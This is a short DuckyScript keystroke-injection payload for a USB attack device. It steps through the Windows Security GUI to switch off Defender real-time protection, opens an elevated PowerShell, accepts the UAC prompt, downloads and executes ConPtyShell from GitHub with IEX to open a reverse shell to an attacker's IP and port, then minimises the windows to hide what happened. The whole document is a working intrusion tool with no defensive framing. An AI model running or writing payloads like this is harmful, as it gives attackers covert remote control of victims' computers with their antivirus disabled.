REM ************************************
REM Disables Windows-Defender through GUI
REM ************************************
DELAY 200
GUI
DELAY 100
STRING Viren-
DELAY 100
ENTER
DELAY 1000
TAB
TAB
TAB
TAB
DELAY 200
ENTER
DELAY 100
SPACE
DELAY 1000
TAB
TAB
DELAY 100
ENTER
DELAY 100
REM ************************************
REM Connectiong to Server through netcat
REM ************************************
GUI r
DELAY 100
STRING powershell Start-Process powershell -Verb runAs
DELAY 100
ENTER
DELAY 1000
TAB
TAB
DELAY 100
ENTER
DELAY 500
STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [IP] [PORT]
DELAY 100
ENTER
DELAY 100
GUI d




